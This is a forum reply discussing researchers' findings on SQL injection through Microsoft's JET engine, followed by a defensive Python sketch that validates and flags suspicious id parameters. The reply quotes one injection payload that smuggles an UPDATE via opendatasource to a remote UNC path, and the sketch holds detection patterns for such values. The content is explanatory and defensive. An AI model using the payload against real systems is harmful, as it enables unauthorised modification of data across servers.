Reply to post: Interesting

JET engine flaws can crash Microsoft's IIS, SQL Server, say Palo Alto researchers

yetanotheraoc Silver badge

Interesting

I looked at their slides. It's a real sql injection attack; like all such attacks, it requires not sanitizing the input parameter. One example they give:

sql="select * from persons where personid="&id

id="1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0','data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;"

So if someone codes a client that allows sql injection (not that anybody ever does that), and someone else codes a server to not restrict the database application permissions outside of the database itself (not that anybody ever does that), then the jet engine allows all kinds of selects and updates on various kinds of "data sources" on the server. Or as in their example, even on a different server, assuming the database application runs in a context that has permissions there.

The MS Access angle is a red herring. It's more a jet engine vulnerability. I can understand why Microsoft is not too upset about it. It requires a coding error on the client *and* a permissions error on the server. But the authors are correct there are probably a lot of setups like that.
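An added example, not part of the comment above or of the researchers' slides: a Python sketch of the client-side check the comment says is missing, accepting the `id` parameter only as a plain integer and flagging values that reference an ad hoc data source or a UNC path, as the quoted payload does. The request targets, the `/person.asp` path, the address and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request targets (assumptions, not taken from the slides).
SAMPLE_REQUESTS = [
    "/person.asp?id=42",
    "/person.asp?id=1%3BUPDATE%20opendatasource('Microsoft.ACE.OLEDB.12.0'"
    "%2C'data%20source%3D%5C%5C192.0.2.10%5Cshare%5Cx.mdb')...",
    "/person.asp?id=12abc",
]

INT_RE = re.compile(r"[0-9]{1,9}")                      # ASCII digits only
ADHOC_RE = re.compile(r"\bopendatasource\s*\(", re.I)   # ad hoc data source call
UNC_RE = re.compile(r"\\\\[^\\\s']+\\")                 # \\host\ prefix of a UNC path


def parse_person_id(raw):
    """Allowlist check: return the id as int, or None if it is not a plain integer."""
    return int(raw) if INT_RE.fullmatch(raw) else None


def classify(request_target, param="id"):
    """Return (verdict, reasons) for every value of `param` in one request target."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    reasons = []
    for value in values:
        if parse_person_id(value) is None:
            reasons.append("non-integer id")
        if ADHOC_RE.search(value):
            reasons.append("ad hoc data source")
        if UNC_RE.search(value):
            reasons.append("UNC path")
    return ("reject" if reasons else "allow", reasons)


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        verdict, reasons = classify(target)
        print(f"{verdict:6} {', '.join(reasons) or '-':45} {target[:40]}")
```

The integer allowlist alone rejects the payload; the two extra patterns only make the log entry say why. The value that passes should still be bound as a query parameter rather than concatenated into the statement.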
